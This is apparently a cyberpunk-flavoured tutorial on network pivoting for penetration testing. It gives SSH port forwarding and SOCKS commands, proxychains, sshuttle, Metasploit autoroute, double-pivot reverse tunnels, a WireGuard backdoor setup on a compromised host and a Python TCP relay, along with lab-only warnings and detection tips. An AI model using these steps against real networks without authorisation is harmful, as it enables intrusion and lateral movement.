You walk down neon-lit alleys where data flows like streams of electric acid, the hum of servers a subterranean heartbeat beneath the city. Rain-slicked concrete reflects QR codes projected on grimy walls, the glow of holograms, the flicker of digital ghosts locked behind firewalls. You strap on your VR goggles, don your cyber-coat, crunch through terminal prompts, code pulsing in your blood. In this world the boundary between networks is more than a wire, more than a port, it is a shifting membrane, a battlefield where knowledge is the edge and friction is your teacher.

Here in the electric dusk you heard about pivoting. From one network to the next. A worm crawling through routers, a rabbit tunnelling beneath fences, a hacker’s path through layers of trust. For those starting out, pivoting is not villainy only, it is mastery. It is the craft that turns a shell on a compromised host into an entire domain’s collapse, or turns a fortressed environment into a lab for learning. And you, bright eyes, eager and trembling, will get the ropes, the tools, the warnings, the practice. Welcome to the underworld of lateral moves, VLAN crossings, hop-by-hop infiltration. Let the circuits whisper secrets.

What Is Pivoting?

Pivoting means using one compromised host or network segment as a stepping stone to access another that you cannot reach directly. Think of it like a relay in espionage, a proxy in the shadows. You gain control of one machine inside a perimeter, then you use that machine as your launchpad, your tunnel, your wormhole deeper into the target.

There are a few pivoting modes:
- Proxy pivoting: you forward traffic via the compromised machine.
- Port-forwarding pivoting: you forward specific ports from that machine.
- VPN or SSH tunnelling: creating encrypted channel from your local system through the compromised host.
- Pivoting through multiple hops: chaining compromised hosts, each one deeper into the network.

Mindset Before Tools

Before you start poking routers, routers in offices or virtual clouds, you must grasp trust, privilege, segmentation. Networks are supposed to be isolated, VLANs separated, firewalls between DMZs and internal subnets. Policies, ACLs, Zero-Trust anythings. When you pivot, you’re breaking assumptions. Always remember laws, AUPs, consent. In many environments pivoting without explicit authorisation is illegal. We talk about it academically, for learning, for capture-the-flag scenarios, for red teaming, for penetration testing with permission.

Techniques of Pivoting

Here are some common techniques, described simply, with enough depth to empower you.

SSH Tunnelling (Local and Remote Forwarding)

If you have SSH access to a machine inside the target network, you can forward ports.

Local Port Forwarding

You run on your workstation:

bash
ssh -L 9000:internal.target.com:80 user@pivot.example.com

This forwards your localhost port 9000 to port 80 on internal.target.com via pivot.example.com. Then you can curl http://localhost:9000 or point your browser to http://localhost:9000 to access the internal web server.

Remote Port Forwarding

If you need to expose a service from your local environment to the target machine:

bash
ssh -R 8080:localhost:3000 user@pivot.example.com

That opens port 8080 on pivot.example.com which forwards to your local machine’s port 3000. Useful for collaboration, or to make services accessible from inside.

SOCKS Proxy

You can create a SOCKS proxy via SSH, then configure proxychains or your browser:

bash
ssh -D 1080 user@pivot.example.com

Your local port 1080 becomes a dynamic proxy, routing traffic through pivot.example.com to internal networks. With proxychains, your tools can tunnel all traffic through that proxy.

VPN Pivoting

You might install OpenVPN or WireGuard on the compromised host, then connect it back to your workstation. That host becomes a network node for you.

Sketch in Python or Bash to automate setting up a WireGuard peer on the compromised host might look like:

bash
# On pivot host (requires root and permissions)
apt update && apt install wireguard iptables -y

# Generate keys
wg genkey | tee privatekey | wg pubkey > publickey

# Create wg0.conf
cat <<EOF > /etc/wireguard/wg0.conf
[Interface]
PrivateKey = $(cat privatekey)
Address = 10.0.10.2/24
ListenPort = 51820

[Peer]
PublicKey = YOUR_PUBLIC_KEY
Endpoint = your.home.ip:51820
AllowedIPs = 10.0.10.0/24
PersistentKeepalive = 25
EOF

# Start interface
wg-quick up wg0

# Enable IP forwarding
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Warning: this snippet if misused in production or without authorisation could be deemed malicious. Only practice in lab environments or with permission.

Pivoting with Tools

• Metasploit’s autoroute or meterpreter: allows routing of your traffic through compromised hosts to other networks.
• Proxychains or Redsocks: to funnel tool traffic through pivots.
• Chisel or Ngrok-like tunnels: to punch through NATs, firewalls.

Practical Example: SSH Jump + Proxychains

You are in a capture-the-flag style lab. Your workstation cannot reach 10.10.20.15 in subnet B. You have SSH access to 10.10.10.5 in subnet A, which can reach subnet B.

1. Tunnel SOCKS via SSH:

bash
    ssh -D 1080 user@10.10.10.5

2. Configure proxychains.conf on your workstation (Linux):

ini
    [ProxyList]
    socks5  127.0.0.1 1080

3. Use tools via proxychains:

bash
    proxychains nmap -sT -Pn 10.10.20.15 -p 1-65535

You scan the host behind another network. You have pivoted without touching routers directly.

Elevating Privileges and Lateral Movement

Pivoting often follows privilege escalation and lateral movement. After you compromise one host, you may explore neighbouring hosts in that subnet, or travel across trust paths (e.g. shared credentials, weak protocols like SMB).

SMB Relay / NTLM Relay

In Windows environments, if there are misconfigurations, you might relay NTLM authentication to another service. That is deeply technical, requires intercepting traffic, relaying credentials, a kind of underhanded pivot.

PowerShell Example: Remote Execution

If you gain local admin on a Windows machine in network A, to execute commands on network B’s machines, assuming you have credentials:

powershell
$Cred = Get-Credential
Invoke-Command -ComputerName "TargetB" -Credential $Cred -ScriptBlock {
    ipconfig /all
}

You can enumerate interfaces, extract passwords from memory, explore trusts.

Network Segmentation, Isolation and How Pivoting Fails

Pivoting depends on flawed network design. Here’s what stops it:

• Strict network segmentation, VLANs separated by firewalls.
• Zero-Trust models: machines only allowed minimal necessary trust.
• Credential segregation: admin accounts not reused, no lateral trust.
• Monitoring: detection of unusual traffic, strange port forwarding, SSH tunnels.

Detection and Defence

As a learner you should also think like defender. What log entries betray a pivot?

• SSH sessions with port forwarding or dynamic Socks forwarding.
• Unexpected connections from host to host, especially if normally isolated.
• Tunnels over uncommon ports.
• Firewall events: forwarded traffic, NAT changes.

Tools to Practice Safely

You want hands on experience, but you must avoid legal risk. Use:

• Own lab: virtual machines, VLANs defined via virtual switches.
• Capture the Flag (CTF) environments.
• Vuln-boxes like Hack The Box, TryHackMe.
• Use intentionally vulnerable VM distributions (Metasploitable, OWASP Broken Web Apps).

Sample Script: Simple Python Proxy-Forward

Below is a minimal Python script that forwards TCP traffic from your machine via a compromised pivot (acting as simple relay). This is for educational use only in a lab.

python
import socket
import threading

def handle(client_socket, remote_host, remote_port):
    remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote.connect((remote_host, remote_port))
    while True:
        data = client_socket.recv(4096)
        if not data:
            break
        remote.sendall(data)
        resp = remote.recv(4096)
        if not resp:
            break
        client_socket.sendall(resp)
    client_socket.close()
    remote.close()

def main(local_port, remote_host, remote_port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('0.0.0.0', local_port))
    server.listen(5)
    print(f"Listening on 0.0.0.0:{local_port}, forwarding to {remote_host}:{remote_port}")
    while True:
        client_sock, addr = server.accept()
        threading.Thread(target=handle, args=(client_sock, remote_host, remote_port)).start()

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <local_port> <remote_host> <remote_port>")
        sys.exit(1)
    lp = int(sys.argv[1])
    rh = sys.argv[2]
    rp = int(sys.argv[3])
    main(lp, rh, rp)

Warning: deploying this in uncontrolled environments without explicit consent is likely illegal or malicious.

You are standing in a data cathedral, every light-striped corridor labelled “Internal”, “Secure”, “Confidential”. Pivoting is learning how to slip between those corridors without tripping alarms, how to walk through walls the designers thought were solid, how to manipulate trust so even the guards believe your forged key.

Mastering pivoting is not about breaking things, it is about seeing the seams, understanding the protocols, appreciating the fragile trust that connects devices. For you, cyber-punk child, this knowledge is not simply power, it is responsibility, a dance with shadows where each step must be precise because one misstep triggers crash, detection, exile.

From One Network to the Next – Mastering the Pivot

Aim

You will learn how to use a compromised host to access additional machines inside a network that are not directly reachable, by applying practical pivoting techniques.

Learning outcomes

After working through this guide you will be able to:
- Understand what network pivoting is and why it matters in penetration testing.
- Use SSH tunnelling, proxy-pivoting and routing table manipulation to move laterally across networks.
- Apply tools such as Metasploit’s autoroute, proxychains, sshuttle to pivot successfully.
- Implement double pivot or reverse tunnel setups when direct access is not available.

Prerequisites

You need:
- Linux workstation (e.g. Kali or Ubuntu) as attacker machine.
- One compromised host inside the target network (shell access or equivalent).
- Tools installed: ssh, proxychains, sshuttle, Metasploit.
- Basic knowledge of networking: subnets, IP routing, SSH, proxies.
- Suitable lab environment or virtual machines to test safely.

Step-by-step guide

1. Gain local foothold and perform reconnaissance
   - Ensure you have shell access on the compromised host.
   - Use ifconfig or ip addr to find host’s IP and internal subnets.
   - Run netstat -rn or ip route to view routing table.

2. SSH pivoting: Forwarding ports through the compromised host
   - From your machine run:

bash
     ssh -L 9000:TARGET_INTERNAL_IP:TARGET_PORT user@compromised_host

• This tunnels traffic from your local port 9000 through the compromised host to the target inside the internal network.

3. Dynamic proxy via SSH (SOCKS proxy)
   - Establish a dynamic port forwarding SOCKS proxy:

bash
     ssh -D 1080 user@compromised_host

• Configure proxychains to use socks5 127.0.0.1 1080, then direct tools (nmap, curl, browsers) through that proxy. (eccouncil.org)

4. Using sshuttle as a VPN-like tunnel
   - On attacker machine run:

bash
     sshuttle -r user@compromised_host INTERNAL_SUBNET/24

• All traffic for that subnet is transparently routed via the compromised host. (eccouncil.org)

5. Routing table pivot with Metasploit autoroute
   - In Metasploit session after compromise, run:

     run autoroute -s 10.10.10.0 -n 255.255.255.0

• This adds a route for the internal network via the compromised host, allowing sessions to reach internal targets through it. (eccouncil.org)

6. Double pivot or reverse SSH tunnel when direct SSH is blocked
   - Suppose you have compromised host A which cannot SSH out but can be used as an intermediate. Use remote forwarding:

bash
     ssh -f -N -R 2222:127.0.0.1:22 your_user@attack_machine

• Then from attack machine:

bash
     ssh -f -N -D 8888 -p 2222 your_user@localhost

• You get a SOCKS proxy via two hops (double pivot). (theyhack.me)

7. Web-based pivoting / HTTP/HTTPS tunnelling
   - When only ports 80 or 443 are open, use HTTP tunnelling tools or web shells to forward traffic.
   - For example use httptunnel or set up a reverse proxy on the compromised host forwarding traffic.

8. Test and target internal hosts
   - Once pivot path is established, run internal port scans:

bash
     nmap -p- INTERNAL_HOST_IP

• Use the proxychains or sshuttle route to connect to services like SMB, RDP or databases.

9. Maintain stealth and clean up
   - Use encrypted tunnels where possible.
   - Remove or restore any configuration you modified (SSH keys, autoroute entries).
   - Close open ports or proxy tunnels.

Practical code snippets

bash
# SSH local port forwarding
ssh -L 9000:192.168.1.100:3389 user@compromised_host

# SSH dynamic SOCKS proxy
ssh -D 1080 user@compromised_host

bash
# Using sshuttle to route an internal subnet via compromised host
sshuttle -r user@compromised_host 192.168.1.0/24

text
# In Metasploit console
meterpreter> run autoroute -s 192.168.1.0 -n 255.255.255.0

bash
# Double pivot: remote and dynamic forwarding
ssh -f -N -R 2222:127.0.0.1:22 your_user@attack_machine
ssh -f -N -D 8888 -p 2222 your_user@localhost

By following these steps you will build your ability to move from one network to the next using compromised hosts, improving your penetration-testing skill and discovering critical internal vulnerabilities.

Go ahead, drop into your lab, light up your console, carve tunnels, learn the art of pivoting, and let your curiosity guide you deeper.